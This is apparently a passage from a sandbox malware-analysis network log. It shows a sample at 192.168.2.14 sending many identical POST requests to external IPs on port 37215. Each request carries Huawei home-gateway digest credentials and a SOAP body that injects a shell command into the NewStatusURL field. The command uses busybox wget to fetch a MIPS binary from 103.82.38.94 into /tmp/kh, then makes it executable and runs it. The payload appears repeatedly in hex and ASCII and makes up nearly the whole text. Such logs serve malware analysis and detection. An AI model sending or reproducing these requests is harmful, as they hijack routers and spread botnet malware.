[TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.144814841.252.252.23037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093441010 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.145042041.29.33.19137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093477964 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.1440242156.250.246.8637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093504906 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.145716041.24.86.9237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093530893 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.145292641.226.92.24037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093544960 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.1451710156.125.129.6337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093590975 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.145498841.218.92.4037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093612909 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.146045641.154.117.15837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093638897 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.145039841.116.113.13037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093671083 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.1445050197.175.129.19537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093697071 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.1456822197.116.225.22337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093734980 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
